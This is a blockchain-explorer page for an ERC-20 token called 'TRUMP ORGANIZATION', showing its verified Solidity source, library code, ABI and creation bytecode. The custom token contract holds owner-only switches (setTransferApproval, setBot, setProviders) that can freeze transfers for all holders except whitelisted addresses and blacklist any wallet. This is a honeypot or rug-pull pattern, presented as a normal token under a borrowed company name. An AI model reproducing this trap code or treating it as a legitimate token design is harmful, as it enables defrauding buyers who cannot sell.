Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000,000 $TRUMP_ORG
Holders
10
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
58,788,992.714547150348831815 $TRUMP_ORGValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
TRUMPORG
Compiler Version
v0.8.16+commit.07a7930e
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/access/Ownable.sol"; import "@openzeppelin/contracts/utils/math/SafeMath.sol"; import "@openzeppelin/contracts/interfaces/IERC20.sol"; contract TRUMPORG is IERC20, Ownable { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping (address => uint256)) private _allowances; mapping(address => bool) public isBot; mapping(address => bool) public liqProviders; uint256 private _totalSupply; uint256 private inittotalSupply = 10000000000000000000000000000; uint8 private _decimals; string private _symbol; string private _name; address public deployer; bool public transferApproval = true; constructor() { _name = "TRUMP ORGANIZATION"; _symbol = "$TRUMP_ORG"; _decimals = 18; _totalSupply = 10000000000000000000000000000; _balances[_msgSender()] = _totalSupply; emit Transfer(address(0), _msgSender(), _totalSupply); } /** * @dev Returns the erc token owner. */ function getOwner() external view returns (address) { return owner(); } /** * @dev Returns the token decimals. */ function decimals() external view returns (uint8) { return _decimals; } /** * @dev Returns the token symbol. */ function symbol() external view returns (string memory) { return _symbol; } /** * @dev Returns the token name. */ function name() external view returns (string memory) { return _name; } /** * @dev See {ERC20-totalSupply}. */ function totalSupply() external override view returns (uint256) { return _totalSupply; } /** * @dev See {ERC20-balanceOf}. */ function balanceOf(address account) external override view returns (uint256) { return _balances[account]; } /** * @dev See {ERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) external override returns (bool) { require(!isBot[_msgSender()] || liqProviders[_msgSender()], "You are a bot"); require(transferApproval || liqProviders[_msgSender()], "Can't transfer MERA tokens"); _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {ERC20-allowance}. */ function allowance(address owner, address spender) external override view returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {ERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) external override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {ERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for `sender`'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) { require(!isBot[_msgSender()] || liqProviders[_msgSender()], "You are a bot"); require(transferApproval || liqProviders[_msgSender()], "Can't transfer MERA tokens"); _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {ERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {ERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Destroys `amount` tokens and assigns them to `_msgSender()`, reducing * the total supply. * * Requirements * * - `_msgSender()` must be the token owner */ function burn(uint256 amount) public returns (bool) { _burn(_msgSender(), amount); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal { require(account != address(0), "ERC20: burn from the zero address"); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Destroys `amount` tokens from `account`.`amount` is then deducted * from the caller's allowance. * * See {_burn} and {_approve}. */ function _burnFrom(address account, uint256 amount) internal { _burn(account, amount); _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance")); } /** * setBot * @dev function that sets blacklisted address **/ function setBot(address _addr, bool _value) external onlyOwner { require(isBot[_addr] != _value, "Not changed"); isBot[_addr] = _value; } /** * setProviders * @dev function that sets blacklisted address **/ function setProviders(address _addr, bool _value) external onlyOwner { require(liqProviders[_addr] != _value, "Not changed"); liqProviders[_addr] = _value; } /** * setTransferApproval * @dev function that sets transfer approval status **/ function setTransferApproval(bool _value) external onlyOwner { require(transferApproval != _value, "Not changed"); transferApproval = _value; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (interfaces/IERC20.sol) pragma solidity ^0.8.0; import "../token/ERC20/IERC20.sol";
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } }
{ "evmVersion": "london", "libraries": {}, "metadata": { "bytecodeHash": "ipfs", "useLiteralContent": true }, "optimizer": { "enabled": true, "runs": 1000 }, "remappings": [], "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deployer","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isBot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"liqProviders","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_addr","type":"address"},{"internalType":"bool","name":"_value","type":"bool"}],"name":"setBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_addr","type":"address"},{"internalType":"bool","name":"_value","type":"bool"}],"name":"setProviders","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_value","type":"bool"}],"name":"setTransferApproval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferApproval","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526b204fce5e3e25026110000000600655600a805460ff60a01b1916600160a01b1790553480156200003457600080fd5b50620000403362000146565b6040805180820190915260128152712a292aa6a81027a923a0a724ad20aa24a7a760711b60208201526009906200007890826200023b565b5060408051808201909152600a815269245452554d505f4f524760b01b6020820152600890620000a990826200023b565b506007805460ff191660121790556b204fce5e3e25026110000000600581905560016000620000d53390565b6001600160a01b03168152602081019190915260400160002055336001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040516200013891815260200190565b60405180910390a362000307565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620001c157607f821691505b602082108103620001e257634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023657600081815260208120601f850160051c81016020861015620002115750805b601f850160051c820191505b8181101562000232578281556001016200021d565b5050505b505050565b81516001600160401b0381111562000257576200025762000196565b6200026f81620002688454620001ac565b84620001e8565b602080601f831160018114620002a757600084156200028e5750858301515b600019600386901b1c1916600185901b17855562000232565b600085815260208120601f198616915b82811015620002d857888601518255948401946001909101908401620002b7565b5085821015620002f75787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6111a780620003176000396000f3fe608060405234801561001057600080fd5b506004361061018d5760003560e01c8063868873b0116100e3578063a9059cbb1161008c578063dd62ed3e11610066578063dd62ed3e1461034d578063ee3eb74e14610386578063f2fde38b146103a957600080fd5b8063a9059cbb14610313578063d186ab6a14610326578063d5f394881461033a57600080fd5b806395d89b41116100bd57806395d89b41146102e55780639d181d44146102ed578063a457c2d71461030057600080fd5b8063868873b01461029c578063893d20e8146102af5780638da5cb5b146102d457600080fd5b8063342aa8b51161014557806342966c681161011f57806342966c681461025857806370a082311461026b578063715018a61461029457600080fd5b8063342aa8b51461020d57806339509351146102225780633bbac5791461023557600080fd5b806318160ddd1161017657806318160ddd146101d357806323b872dd146101e5578063313ce567146101f857600080fd5b806306fdde0314610192578063095ea7b3146101b0575b600080fd5b61019a6103bc565b6040516101a79190610eda565b60405180910390f35b6101c36101be366004610f44565b61044e565b60405190151581526020016101a7565b6005545b6040519081526020016101a7565b6101c36101f3366004610f6e565b610465565b60075460405160ff90911681526020016101a7565b61022061021b366004610fba565b6105ae565b005b6101c3610230366004610f44565b61063f565b6101c3610243366004610fed565b60036020526000908152604090205460ff1681565b6101c3610266366004611008565b610675565b6101d7610279366004610fed565b6001600160a01b031660009081526001602052604090205490565b610220610689565b6102206102aa366004610fba565b61069d565b6000546001600160a01b03165b6040516001600160a01b0390911681526020016101a7565b6000546001600160a01b03166102bc565b61019a61072e565b6102206102fb366004611021565b61073d565b6101c361030e366004610f44565b6107ce565b6101c3610321366004610f44565b61081d565b600a546101c390600160a01b900460ff1681565b600a546102bc906001600160a01b031681565b6101d761035b36600461103c565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101c3610394366004610fed565b60046020526000908152604090205460ff1681565b6102206103b7366004610fed565b610905565b6060600980546103cb90611066565b80601f01602080910402602001604051908101604052809291908181526020018280546103f790611066565b80156104445780601f1061041957610100808354040283529160200191610444565b820191906000526020600020905b81548152906001019060200180831161042757829003601f168201915b5050505050905090565b600061045b338484610995565b5060015b92915050565b3360009081526003602052604081205460ff16158061049357503360009081526004602052604090205460ff165b6104d45760405162461bcd60e51b815260206004820152600d60248201526c165bdd48185c99481848189bdd609a1b60448201526064015b60405180910390fd5b600a54600160a01b900460ff16806104fb57503360009081526004602052604090205460ff165b6105475760405162461bcd60e51b815260206004820152601a60248201527f43616e2774207472616e73666572204d45524120746f6b656e7300000000000060448201526064016104cb565b610552848484610aee565b6105a4843361059f85604051806060016040528060288152602001611125602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610ca6565b610995565b5060019392505050565b6105b6610cd2565b6001600160a01b03821660009081526003602052604090205481151560ff9091161515036106145760405162461bcd60e51b815260206004820152600b60248201526a139bdd0818da185b99d95960aa1b60448201526064016104cb565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161045b91859061059f9086610d2c565b60006106813383610d3f565b506001919050565b610691610cd2565b61069b6000610e66565b565b6106a5610cd2565b6001600160a01b03821660009081526004602052604090205481151560ff9091161515036107035760405162461bcd60e51b815260206004820152600b60248201526a139bdd0818da185b99d95960aa1b60448201526064016104cb565b6001600160a01b03919091166000908152600460205260409020805460ff1916911515919091179055565b6060600880546103cb90611066565b610745610cd2565b801515600a60149054906101000a900460ff161515036107955760405162461bcd60e51b815260206004820152600b60248201526a139bdd0818da185b99d95960aa1b60448201526064016104cb565b600a8054911515600160a01b027fffffffffffffffffffffff00ffffffffffffffffffffffffffffffffffffffff909216919091179055565b600061045b338461059f8560405180606001604052806025815260200161114d602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610ca6565b3360009081526003602052604081205460ff16158061084b57503360009081526004602052604090205460ff165b6108875760405162461bcd60e51b815260206004820152600d60248201526c165bdd48185c99481848189bdd609a1b60448201526064016104cb565b600a54600160a01b900460ff16806108ae57503360009081526004602052604090205460ff165b6108fa5760405162461bcd60e51b815260206004820152601a60248201527f43616e2774207472616e73666572204d45524120746f6b656e7300000000000060448201526064016104cb565b61045b338484610aee565b61090d610cd2565b6001600160a01b0381166109895760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201527f646472657373000000000000000000000000000000000000000000000000000060648201526084016104cb565b61099281610e66565b50565b6001600160a01b038316610a105760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f726573730000000000000000000000000000000000000000000000000000000060648201526084016104cb565b6001600160a01b038216610a8c5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f737300000000000000000000000000000000000000000000000000000000000060648201526084016104cb565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610b6a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f647265737300000000000000000000000000000000000000000000000000000060648201526084016104cb565b6001600160a01b038216610be65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f657373000000000000000000000000000000000000000000000000000000000060648201526084016104cb565b610c23816040518060600160405280602681526020016110ff602691396001600160a01b0386166000908152600160205260409020549190610ca6565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610c529082610d2c565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610ae19085815260200190565b60008184841115610cca5760405162461bcd60e51b81526004016104cb9190610eda565b505050900390565b6000546001600160a01b0316331461069b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104cb565b6000610d3882846110b6565b9392505050565b6001600160a01b038216610dbb5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360448201527f730000000000000000000000000000000000000000000000000000000000000060648201526084016104cb565b610df8816040518060600160405280602281526020016110dd602291396001600160a01b0385166000908152600160205260409020549190610ca6565b6001600160a01b038316600090815260016020526040902055600554610e1e9082610ece565b6005556040518181526000906001600160a01b038416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b600080546001600160a01b038381167fffffffffffffffffffffffff0000000000000000000000000000000000000000831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610d3882846110c9565b600060208083528351808285015260005b81811015610f0757858101830151858201604001528201610eeb565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610f3f57600080fd5b919050565b60008060408385031215610f5757600080fd5b610f6083610f28565b946020939093013593505050565b600080600060608486031215610f8357600080fd5b610f8c84610f28565b9250610f9a60208501610f28565b9150604084013590509250925092565b80358015158114610f3f57600080fd5b60008060408385031215610fcd57600080fd5b610fd683610f28565b9150610fe460208401610faa565b90509250929050565b600060208284031215610fff57600080fd5b610d3882610f28565b60006020828403121561101a57600080fd5b5035919050565b60006020828403121561103357600080fd5b610d3882610faa565b6000806040838503121561104f57600080fd5b61105883610f28565b9150610fe460208401610f28565b600181811c9082168061107a57607f821691505b60208210810361109a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561045f5761045f6110a0565b8181038181111561045f5761045f6110a056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212206ae7a0e9fb62583e672cf35c6894ab30a113d9c9fc87c8510a77606842c1e7e364736f6c63430008100033
Deployed Bytecode
